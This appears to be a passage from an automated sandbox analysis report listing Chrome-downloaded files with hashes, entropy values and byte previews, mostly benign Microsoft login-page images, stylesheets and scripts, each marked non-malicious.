                                                                                                                        Preview:...........}[.8.8.....3.I......n6.8.i .....0<...7....^&d?...$..p.....=..l.$.J.RUY*}....U.ki.....7....t.....t.o.^....O...l.....F......X.sJ._....A..B+fQi...ky.i..K.#+-...f.Q.s...M.....P]..0~+.]U.P?....Ci;X...c\..Y......?b............(.....}.F.%.g..KV.J..K. ..9....!E..5.[.....v..pJ.._.. ..%t.....VU.H*C|.8....,..i.\.V...#j......gi..L7#.>#..W..<,.."..^...yo.Yh.Hr....5...3?.x..N.J.|..P.....`.`..-U..F.*.T.#..F...Tn...Z{.V...8^D.O37~\N.v0....gE.....s>.m<...#...9....r..........+..g.._I.................ig..mD..*+.\..>..a........].^..O.^..n.w...OA.c.,~<...*...E..h.........U..h...I....j..-...Zw...]],..2.@+......".....wU..1TYfw...O.jpvw...-1.......J....4Wk.2W..Q[.$d............./.s...&bt@.ML2W...S.E..Z..D!....X..c=}.*..;.4m}*.P:=q}......0.........1.F....@...W%~.A...t..'a....Y.9h.(O...d@.b.4.`.b*.f.5.V!B.f,.>.-q.Gz........ ..k.....P}...ELW..w..b.}=...H$...nt%.G.2u.......d.0%-.,.Taf3+z..!..=\Wt'....#..3......X|.L...n..5ge.....7...S2dJ.xD..&.e.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):3620
                                                                                                                        Entropy (8bit):6.867828878374734
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):673
                                                                                                                        Entropy (8bit):7.6596900876595075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                        Malicious:false
                                                                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1592
                                                                                                                        Entropy (8bit):4.205005284721148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                        MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                        SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                        SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                        SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                        Malicious:false
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2672
                                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                        Malicious:false
                                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (61177)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):113084
                                                                                                                        Entropy (8bit):5.285180915082997
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:QpHDgBvguhw+EViazA/PWrF7qvEAFiQcpmchSeC2Jzc6VUWG:xkNh06VUT
                                                                                                                        MD5:D62B4EDEB512B07ABEF4688E27ECDDE3
                                                                                                                        SHA1:981A7825DA5E29938AB6FE0CBFE2DB622F7B8333
                                                                                                                        SHA-256:4B01A0A34CE8ED4BC8A8713BE0442D49DA6A756236B7B4424622CA3DEE820F41
                                                                                                                        SHA-512:6E91B285BEA8566EBB7829F592744A6706CF6498E6D5DC1C5A0EBDD0A685D767AA215B275A88568B957E6BE824AEE60521ED1D77D92A697A3CE0F446ECDCDDB9
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css
                                                                                                                        Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1435
                                                                                                                        Entropy (8bit):7.8613342322590265
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                        Malicious:false
                                                                                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):61052
                                                                                                                        Entropy (8bit):7.996159932827634
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                        MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                        SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                        SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                        SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                        Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):3620
                                                                                                                        Entropy (8bit):6.867828878374734
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2672
                                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 111517
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):20268
                                                                                                                        Entropy (8bit):7.979003164664344
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:lWgthmTXjToq1rGiHMhPk4jXACDMltlPBIzv0tUGFEH/tvGgSmeya:lWgiTXP1rrEPjjXACDM/pKLYFEffSHya
                                                                                                                        MD5:A130F0979EB8F2893B4E44263A40CAF9
                                                                                                                        SHA1:DFF401DAC339CD0181B4E8129E1873F48BCFC342
                                                                                                                        SHA-256:FB6270BCCA87411ADFB7D3E67DDBC1D4970F895555A0E34F6D4A70BE96A0E006
                                                                                                                        SHA-512:3176ED93F4AF696F5B64A6846B51011E6C7D1455FFA1F8C7515C710B98486C8F5F0D1C96683E73C1373E1B13896EFC3B6D180C01D7F2A60CED3405F2355CEE45
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
                                                                                                                        Preview:...........m....(.].b.\....r..dE.YV.=Go%..I.T.Yr...!.wf........h..p.Z.O9.%.......4......D/..]._......u...\5$..U...6...E.....q.......x.m.......?Fo..}......;......./^F..<y.q...*/...{...2*.QYE.v!.....].i...r.5.,.U..f.."....*+...)!W-.wi..E.....#.-I{.-.P..M..t.d....h.]fUt...k..*[d9.ST.I.YD'J.,..&Z.U.......SP.Y1.......KBp..J..0.*....4O.-.bP.E...C..]..........f..tM.Ta._4..L....DEJ.^IE!u../;.P.w.u.n).eqDp.u.e.l.t..2.....7;R..N..M..e..-#~..Y.....x.......^.eS7U...i]GO.. .?zYO.v........|.?y.:..<Jz.A..6o.,:..v...;"....c...fdW......Q.U.X..u..M.w...j.7..4.R.L...L&.*.[.^T.H..E.R9-......5....g.D..sV.2K.'..i..E...r......&..~I. .E..E.4;W.'..&-...D.r....k.n.E:..-sJ.j..&2fvh;.H........^.2j..=...!....4.v-,.jI^?Y.-)2cy.%a.+.Z..B.WeAz0m...s.z.%.^.7.....T..^.t....r....$.S.....Z7b.Xyv3I7.......|..../.....o.z..........Y'.......1"..!....o......:...y.......O._.{u...].y........}O......$.L.~|.......(../...|>......w......J./o.G...p...W..G.~~........7.o..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1864
                                                                                                                        Entropy (8bit):5.222032823730197
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                        Malicious:false
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (64616)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):431980
                                                                                                                        Entropy (8bit):5.453562709137544
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:VWkpEP0V6h/yP6NbxFcQi56skqllX199OL5FwBE0HfN15E7:VWlTBxFcQEzkQlQFw1Y
                                                                                                                        MD5:AD3D3391A6644DF69202428F4E11C4A2
                                                                                                                        SHA1:AFE44EA2C5F53FA660DAE39317987CEB4C85BB46
                                                                                                                        SHA-256:EF6FA330008E245A4A7D432B9227402119C373708C8A59203D46EE10113865EB
                                                                                                                        SHA-512:79FA7B54C5D3D17850D71ADB8DFD3515236B6CBCDEAB4E9FA9E8ECB67C6054E4260DC7EE5B93684D4A12C9B376F8BE468B04999FBFD22D10DFD8F7C9AF76E5C5
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js
                                                                                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (56725)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):156896
                                                                                                                        Entropy (8bit):5.279426339479238
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:y0VKraUIoERbjXrmyYnjawc2KYg5WRtnj1SfCskjsD8rM46h9hI4FCfh1hI4C:y0VUIoQjbTwctYg5WlE208rM469Cy
                                                                                                                        MD5:F9551691D63A43CC3C882F75ED682197
                                                                                                                        SHA1:0411DA4AA8F85BB3E3CB54417F182905A90589D3
                                                                                                                        SHA-256:688A2D42350796280657D4BFEE504616C104FC5AF822938DD79425F467C3B5BC
                                                                                                                        SHA-512:8BA74B6023A5CC060A978570C2000522A247CA8D85E3387DB1DF526FBFB1085A4C85D9988501010AD674B62C69D0331B963C70EE5B3DDD9A0D28C0831288E836
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.js
                                                                                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],{513:function(e,t,r)
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):17174
                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                        Malicious:false
